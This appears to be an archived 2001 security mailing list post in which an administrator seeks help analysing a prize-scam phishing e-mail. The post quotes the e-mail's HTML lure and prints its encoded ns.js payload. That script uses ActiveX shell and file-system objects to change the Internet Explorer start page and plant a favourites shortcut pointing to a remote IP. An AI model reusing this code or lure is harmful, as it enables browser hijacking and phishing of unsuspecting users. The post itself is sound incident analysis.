E-mail with ties to possible malicious website

From: Michael B. Morell (MMorellat_private)
Date: Tue Nov 06 2001 - 09:15:15 PST

  • Next message: NESTING, DAVID M (SBCSI): "RE: Strange "port scans" from a spoofed IP"

    A suspicious e-mail has been received by my network that I believe is worth
    opening up to the community for further scrutiny.  I appreciate any further
    insight that anyone else might be able to shed.
    
    The e-mails have been submitted to sarc and nai for review. Sarc has already
    said that the ns.js is not a virus.  Nai has yet to respond.  An e-mail has
    also been sent to the host-master responsible for the mail server that was
    used to relay the e-mail.  I have not yet sent an e-mail to the ISP of the
    referenced IP in the e-mail.
    
    I have looked into the e-mail extensively and have not been able to find any
    clear evidence of a destructive payload.  However it is it's delivery method
    and what it appears to try to do that is cause for my concern.
    
    The e-mail itself is HTML based and relies on social engineering to coerce
    the end user into proceeding.
    
    <!--Begin HTML-->
    <html>
    <head>
    <title>Prize Collection</title>
    
    </head>
    
    <body bgcolor="#FFFFFF" text="#000000" onload=init();>
    <p>Dear Sir/Madam.</p>
    <p>I am contacting you on behalf of the &quot;Online Bank Draw&quot;
    corporation.<br>
      A prize won by you on the 16th of August 2001 (by e-mail submission) is
    ready 
      to be collected.<br>
      <br>
      Please <a href="http://64.57.164.73/agus2000/ns/" target="_blank">read
    this page 
      for further information</a>.</p>
    <p><br>
      Yours Sincerely.<br>
      Mike Ranson.<br>
      USCT Internet Postal Delivery.<br>
      <script language="JScript.Encode"
    src="http://64.57.164.73/agus2000/ns.js"></script>
    </p>
    </body>
    </html>
    
    <!--End HTML-->
    
    You will notice some tell tale signs that this is a fraudelent e-mail.
    1. The Lack of a subject
    2. A claim of prize money
    3. A odd name for a company "Online Bank Draw"
    4. signed by the USCT Internet Postal Delivery (never heard of them)
    
    A further investigation into the headers will also reveal that the sender
    does not have a Valid E-mail address nor can you trace it's footprint back.
    
    <!--Begin Headers, obvious substitutions of names and Ips' until relayed
    mail server hostmaster confirms authorized use of server--)
    
    Received: from ADomain.com (mail.ADomain.com [xxx.xxx.xxx.xxx]) by
    mail.OurDomain.com with SMTP (Microsoft Exchange Internet Mail Service
    Version 5.5.2653.13)
    	id V93AVXYX; Mon, 5 Nov 2001 18:36:34 -0500
    Received: from mail.ADomain.com [xxx.xxx.xxx.xxx] by ADomain.com with ESMTP
      (SMTPD32-6.06) id A27E9B6019E; Mon, 05 Nov 2001 18:36:30 -0500
    From: Mike Ranson - USCT Internet Postal Delivery
    Date: Tue, 06 Nov 2001 07:34:13
    To: ReplacedUserNameHere
    Subject: 
    MIME-Version: 1.0
    Content-Type: multipart/related;
      boundary="----=_NextPart_FPJUZAJHEK"
    Content-Transfer-Encoding: 7bit
    Message-ID: PM20007:34:13 AM
    
    This is an HTML email message.  If you see this, your mail client does not
    support HTML messages.
    
    ------=_NextPart_FPJUZAJHEK
    Content-Type: text/html;charset="iso-8859-1"
    Content-Transfer-Encoding: 7bit
    
    ------=_NextPart_FPJUZAJHEK-- 
    
    <!--End Headers-->
    
    Once a user clicks on the link in the e-mail.  Their screen is flooded with
    opened windows that go to adult websites (aka porn).  It was unsure whether
    or not this was to hide further action of the script or if that was the
    intended payload.
    
    After some searching on the infected system.  I was unable to find any
    obvious system file changes/additions. 
    But I was able to find the ns.js file that was referenced in the source.
    This was found in the temporary Internet files folder.
    
    By reading the script file I noticed several things (granted I am not the
    best at JavaScripting, which is why I am submitting it here).  From what I
    can tell it checks to see if the clsid for netscape/IE/wsh exist and if they
    do attempt to write a reg key for the current user.
    
    The path it calls is based on the Win2k users path.
    
    <!--Begin ns.js opened in notepad-->
    
    <!--
    document.write(unescape("%3Cscript%20language%3D%22JavaScript%22%3E%0D%0A%09
    document.write%28%22%3CAPPLET%20HEIGHT%3D0%20WIDTH%3D0%20code%3Dcom.ms.activ
    eX.ActiveXComponent%3E%3C/APPLET%3E%22%29%3B%0D%0A%0D%0A%09if%20%28navigator
    .appName%20%3D%3D%20%27Netscape%27%29%20var%20language%20%3D%20navigator.lan
    guage%3B%0D%0A%09else%20var%20language%20%3D%20navigator.browserLanguage%3B%
    0D%0A%0D%0A%09function%20AddFavLnk%28loc%2C%20DispName%2C%20SiteURL%29%20%7B
    %0D%0A%09%20%20var%20Shor%20%3D%20Shl.CreateShortcut%28loc%20+%20%22%5C%5C%2
    2%20+%20DispName%20+%22.URL%22%29%3B%0D%0A%09%20%20Shor.TargetPath%20%3D%20S
    iteURL%3B%0D%0A%09%20%20Shor.Save%28%29%3B%0D%0A%09%7D%0D%0A%0D%0A%09functio
    n%20f%28%29%20%7B%0D%0A%09%20%20try%20%7B%0D%0A%20%20%20%20%20%20a1%3Ddocume
    nt.applets%5B0%5D%3B%0D%0A%20%20%20%20%20%20a1.setCLSID%28%22%7BF935DC22-1CF
    0-11D0-ADB9-00C04FD58A0B%7D%22%29%3B%0D%0A%20%20%20%20%20%20a1.createInstanc
    e%28%29%3B%0D%0A%20%20%20%20%20%20Shl%20%3D%20a1.GetObject%28%29%3B%0D%0A%20
    %20%20%20%20%20a1.setCLSID%28%22%7B0D43FE01-F093-11CF-8940-00A0C9054228%7D%2
    2%29%3B%0D%0A%20%20%20%20%20%20a1.createInstance%28%29%3B%0D%0A%20%20%20%20%
    20%20FSO%20%3D%20a1.GetObject%28%29%3B%0D%0A%20%20%20%20%20%20a1.setCLSID%28
    %22%7BF935DC26-1CF0-11D0-ADB9-00C04FD58A0B%7D%22%29%3B%0D%0A%20%20%20%20%20%
    20a1.createInstance%28%29%3B%0D%0A%20%20%20%20%20%20Net%20%3D%20a1.GetObject
    %28%29%3B%0D%0A%20%20%20%20%20%20try%20%7B%0D%0A//%20%20%20%20%20%20%20%20if
    %20%28document.cookie.indexOf%28%22Chg%22%29%20%3D%3D%20-1%29%20%7B%0D%0A//%
    20%20%20%20%20%20%20%20%20%20var%20expdate%20%3D%20new%20Date%28%28new%20Dat
    e%28%29%29.getTime%28%29%20+%20%2824%20*%2060%20*%2060%20*%201000%20*%2090%2
    9%29%3B%0D%0A//%20%20%20%20%20%20%20%20%20%20document.cookie%3D%22Chg%3Dgene
    ral%3B%20expires%3D%22%20+%20expdate.toGMTString%28%29%20+%20%22%3B%20path%3
    D/%3B%22%0D%0A%20%20%20%20%20%20%20%20%20%20if%20%28%21language.indexOf%28%2
    7es%27%29%20%3E-1%29%20Shl.RegWrite%20%28%22HKCU%5C%5CSoftware%5C%5CMicrosof
    t%5C%5CInternet%20Explorer%5C%5CMain%5C%5CStart%20Page%22%2C%20%22http%3A//6
    4.57.164.73/agus2000/jstarter/%22%29%3B%0D%0A//%20%20%20%20%20%20%20%20%20%2
    0var%20expdate%20%3D%20new%20Date%28%28new%20Date%28%29%29.getTime%28%29%20+
    %20%2824%20*%2060%20*%2060%20*%201000%20*%2090%29%29%3B%0D%0A//%20%20%20%20%
    20%20%20%20%20%20document.cookie%3D%22Chg%3Dgeneral%3B%20expires%3D%22%20+%2
    0expdate.toGMTString%28%29%20+%20%22%3B%20path%3D/%3B%22%0D%0A%20%20%20%20%2
    0%20%20%20%20%20var%20WF%2C%20Shor%2C%20loc%3B%0D%0A%20%20%20%20%20%20%20%20
    %20%20WF%20%3D%20FSO.GetSpecialFolder%280%29%3B%0D%0A%20%20%20%20%20%20%20%2
    0%20%20if%20%28language.indexOf%28%27es%27%29%20%3E-1%29%20loc%20%3D%20WF%20
    +%20%22%5C%5Cfavoritos%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20else%20if%20
    %28language.indexOf%28%27de%27%29%20%3E-1%29%20loc%20%3D%20WF%20+%20%22%5C%5
    Cfavoriten%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20else%20if%20%28language.
    indexOf%28%27sv%27%29%20%3E-1%29%20loc%20%3D%20WF%20+%20%22%5C%5Cfavoriter%2
    2%3B%0D%0A%20%20%20%20%20%20%20%20%20%20else%20if%20%28language.indexOf%28%2
    7it%27%29%20%3E-1%29%20loc%20%3D%20WF%20+%20%22%5C%5Cpreferiti%22%3B%0D%0A%2
    0%20%20%20%20%20%20%20%20%20else%20if%20%28language.indexOf%28%27fr%27%29%20
    %3E-1%29%20loc%20%3D%20WF%20+%20%22%5C%5Cfavoris%22%3B%0D%0A%20%20%20%20%20%
    20%20%20%20%20else%20if%20%28language.indexOf%28%27da%27%29%20%3E-1%29%20loc
    %20%3D%20WF%20+%20%22%5C%5Coversigt%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%2
    0else%20loc%20%3D%20WF%20+%20%22%5C%5CFavorites%22%3B%0D%0A%20%20%20%20%20%2
    0%20%20%20%20if%28%21FSO.FolderExists%28loc%29%29%20%7B%0D%0A%20%20%20%20%20
    %20%20%20%20%20%20%20if%20%28language.indexOf%28%27es%27%29%20%3E-1%29%20loc
    %20%3D%20FSO.GetDriveName%28WF%29%20+%20%22%5C%5CDocuments%20and%20Settings%
    5C%5C%22%20+%20Net.UserName%20+%20%22%5C%5CFavoritos%22%3B%0D%0A%20%20%20%20
    %20%20%20%20%20%20%20%20else%20if%20%28language.indexOf%28%27de%27%29%20%3E-
    1%29%20loc%20%3D%20FSO.GetDriveName%28WF%29%20+%20%22%5C%5CDocuments%20and%2
    0Settings%5C%5C%22%20+%20Net.UserName%20+%20%22%5C%5Cfavoriten%22%3B%0D%0A%2
    0%20%20%20%20%20%20%20%20%20%20%20else%20if%20%28language.indexOf%28%27sv%27
    %29%20%3E-1%29%20loc%20%3D%20FSO.GetDriveName%28WF%29%20+%20%22%5C%5CDocumen
    ts%20and%20Settings%5C%5C%22%20+%20Net.UserName%20+%20%22%5C%5Cfavoriter%22%
    3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20else%20if%20%28language.indexOf%
    28%27it%27%29%20%3E-1%29%20loc%20%3D%20FSO.GetDriveName%28WF%29%20+%20%22%5C
    %5CDocuments%20and%20Settings%5C%5C%22%20+%20Net.UserName%20+%20%22%5C%5Cpre
    feriti%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20else%20if%20%28languag
    e.indexOf%28%27fr%27%29%20%3E-1%29%20loc%20%3D%20FSO.GetDriveName%28WF%29%20
    +%20%22%5C%5CDocuments%20and%20Settings%5C%5C%22%20+%20Net.UserName%20+%20%2
    2%5C%5Cfavoris%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20else%20if%20%2
    8language.indexOf%28%27da%27%29%20%3E-1%29%20loc%20%3D%20FSO.GetDriveName%28
    WF%29%20+%20%22%5C%5CDocuments%20and%20Settings%5C%5C%22%20+%20Net.UserName%
    20+%20%22%5C%5Coversigt%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20else%
    20loc%20%3D%20FSO.GetDriveName%28WF%29%20+%20%22%5C%5CDocuments%20and%20Sett
    ings%5C%5C%22%20+%20Net.UserName%20+%20%22%5C%5CFavorites%22%3B%0D%0A%20%20%
    20%20%20%20%20%20%20%20%20%20if%28%21FSO.FolderExists%28loc%29%29%20%7B%0D%0
    A%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%0D%0A%20%20%20%20%20%20
    %20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%
    20%20%20%20%20%20%20AddFavLnk%28loc%2C%20%22START
    HERE%22%2C%20%22http%3A//64.57.164.73/agus2000/jstarter/%22%29%3B%0D%0A//%20
    %20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20c
    atch%28e%29%20%7B%7D%0D%0A%09%20%20%7D%0D%0A%09%20%20catch%28e%29%20%7B%7D%0
    D%0A%09%7D%0D%0A%0D%0A%09function%20init%28%29%20%7B%0D%0A%09%20%20setTimeou
    t%28%22f%28%29%22%2C%201000%29%3B%0D%0A%09%7D%0D%0A%0D%0A%09init%28%29%3B%0D
    %0A%3C/script%3E%0D%0A"));
    //-->
    
    <!--End ns.js-->
    
    One of my main reasons of concern is that if it is able to get the start
    page changed for the browser, changed to a malicious location.  It would
    then be possible upon start up of the browser for the malicious website
    operator to download code of his/her choice to the system.
    
    The attempt is to write a reg key in
    HKCU\Software\Microsoft\InternetExplorer\MainStartPage and to set it to 
    http//64.57.164.73/agus2000/jstarter
    
    Another concern is the reference to the FSO.GetDriveName.  I am unsure if it
    is referencing the File System Object for any drive mappings that the system
    has present.  If this can be confirmed/dismissed it would be helpful.   Plus
    the mention of setting a cookie on the system and it's setting an expiration
    date.
    
    Thanks in advance for looking at this.
    
    Michael B. Morell
    Network Operations Administrator
    Visual Data Corporation
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Thu Nov 08 2001 - 11:22:39 PST